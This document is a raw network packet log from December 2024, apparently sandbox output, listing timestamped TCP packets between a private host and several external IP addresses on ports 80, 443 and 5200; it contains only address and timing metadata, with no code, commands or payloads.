Dec 9, 2024 08:08:56.885901928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.885955095 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.887520075 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.887538910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.887679100 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.889061928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.889081001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.889091969 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.889126062 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.890814066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.890832901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.890873909 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.891673088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.891685963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.891727924 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.892945051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.892957926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.892992020 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.893542051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.893554926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.893584967 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.894186974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.894200087 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.894210100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.894242048 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.894254923 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.894846916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.894860029 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.894921064 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.895443916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.895459890 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.895505905 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.896127939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.896140099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.896178007 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.896913052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.896925926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.896935940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.896956921 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.897959948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.897973061 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.898004055 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.898962975 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.898974895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.899013996 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.900007963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.900019884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.900052071 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.901043892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.901057005 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.901089907 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.902081013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.902093887 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.902103901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.902143002 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.902156115 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.903141022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.903151989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.903189898 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.904112101 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.904130936 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.904182911 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.905175924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.905189037 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.905232906 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.906192064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.906728029 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.906739950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.906750917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.906760931 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.906796932 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.907763004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.907776117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.907823086 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.908823967 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.908837080 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.908879995 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.909827948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.909841061 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.909894943 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.910851002 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.910862923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.910875082 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.910902023 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.911874056 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.911896944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.911941051 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.912945032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.912961960 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.912993908 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.913969994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.913983107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.914007902 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.914999008 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.915010929 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.915044069 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.916054964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.916066885 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.916079044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.916100979 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.916112900 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.917078018 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.917089939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.917121887 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.918113947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.918126106 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.918158054 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.919166088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.919184923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.919229031 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.920185089 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.920197964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.920207977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.920229912 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.921212912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.921225071 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.921257973 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.922231913 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.922243118 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.922282934 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.923310041 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.923329115 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.923372984 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.924336910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.924349070 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.924380064 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.925318956 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.925446987 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.927408934 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.927421093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.927454948 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.928445101 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.929577112 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.929595947 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.929644108 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.929653883 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.929672003 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.929692984 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.930026054 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.930042028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.930054903 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.930090904 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.930090904 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.932051897 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.932075977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.932121038 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.933079004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.933092117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.933146000 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.934155941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.934168100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.934202909 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.935163975 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.936227083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.936239004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.936273098 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.938273907 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.938287020 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.938342094 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.939296961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.939354897 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.940299034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.940318108 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.940368891 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.941366911 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.942382097 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.942430973 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.943429947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.943443060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.943487883 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.944484949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.945493937 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.945506096 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.945548058 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.946602106 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.946616888 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.946671009 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.946676970 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.946723938 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.947525024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.947546005 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.947577953 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.948554993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.948568106 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.948585033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.948609114 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.948635101 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.949599028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.950678110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.950720072 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.952702045 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.953229904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.953242064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.953289986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.954313993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.954355955 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.955298901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.955311060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.955363035 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.956314087 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.956360102 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.956398010 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.957395077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.958596945 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.958640099 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.959475994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.959487915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.959530115 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.960508108 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.961509943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.961522102 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.961554050 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.963639975 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.963655949 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.963710070 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.963716030 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.963754892 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.968810081 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.968830109 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.968864918 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.968869925 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.968895912 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.968918085 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.976047993 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.976066113 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.976119041 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.976125956 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.976155043 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.976174116 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.981734991 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.981750965 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.981802940 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.981807947 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.981858015 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.987976074 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.987992048 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.988059044 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.988065004 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.988112926 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.994163036 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.994178057 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.994524002 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.994529963 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.994577885 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.995142937 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.995157003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.995197058 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.996164083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.996186972 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.996193886 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.996207952 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.996234894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.997189045 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.997204065 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.997240067 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.997256994 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.998224974 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.998238087 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.998326063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.999203920 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.999250889 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.999743938 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.999757051 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.999789953 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.000792980 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.000827074 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.000838995 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.000842094 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.000864983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.000873089 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.001836061 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.001857996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.001903057 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.002868891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.002882004 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.002918005 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.003909111 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.003923893 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.003959894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.016469002 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:57.058614969 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:57.084968090 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.084989071 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.085063934 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.085063934 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.085072041 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.087316036 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.089982986 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.089994907 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.090049028 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.091828108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.091842890 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.091875076 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.091911077 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.092880964 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.092895985 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.092976093 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.092981100 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.093022108 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.093780994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.093794107 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.093827009 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.095455885 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.095468044 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.095510960 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.096308947 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.096384048 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.097131014 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.097172976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.097933054 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.098004103 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.098743916 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.098756075 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.098797083 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.099560976 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.099607944 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.100364923 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.100383997 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.100414038 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.100425959 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.102154016 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.102166891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.102201939 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.102264881 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.103688002 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.103699923 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.103746891 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.103775024 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.103790045 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.103867054 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.103873014 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.103957891 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.104521990 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.104594946 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.105313063 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.105359077 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.106204033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.107068062 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.107125998 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.107820988 CET	80	49880	185.215.113.206	192.168.2.4
